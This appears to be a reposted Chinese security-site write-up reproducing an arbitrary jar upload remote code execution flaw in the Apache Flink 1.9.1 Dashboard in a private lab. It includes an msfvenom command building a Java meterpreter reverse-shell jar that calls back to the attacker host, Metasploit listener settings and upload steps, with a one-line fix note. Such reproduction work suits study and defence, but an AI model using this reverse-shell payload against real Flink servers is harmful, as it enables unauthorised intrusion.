1. 黑客安全网-互联网安全媒体信息综合平台首页
  2. 漏洞信息

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象

Apache Flink能用来做什么?

  • 实时推荐系统
  • 实时报表
  • 实时数仓与ETL
  • 复杂事件处理
  • 实时欺诈与实时信用评估
  • 大数据安全监测

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01漏洞介绍

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

至目前Apache Flink 1.9.1版本

0x03环境搭建

攻击机kali:192.168.10.147

受害机Ubuntu:192.168.10.176

测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载:

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

下载完成后使用解压

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

进入bin目录运行./start-cluster.sh启动环境

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

环境搭建成功 目标站点 http://192.168.10.176:8081

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x04漏洞复现

使用kali生成jar后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

  1. 攻击机访问目标站点 并上传shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

使用kali配置监听

use exploit/multi/handler

set payload java/shell/reverse_tcp

set RHOST 192.168.10.147

set LPORT 2020

run

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

点开刚刚上传的shell.jar,触发漏洞

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x05修复方式

更新官网补丁或更新最新版本

相关推荐: 最新ZZCMS代码审计初探

本次代码审计的目标是zzcms的最新版本201910。 下载地址为http://www.zzcms.net/about/6.htm。这次审计的主要范围是 /admin 默认后台管理目录(可任意改名)/user 注册用户管理程序存放目录 首先按照手册说明安装并初…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/vuls/3195.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注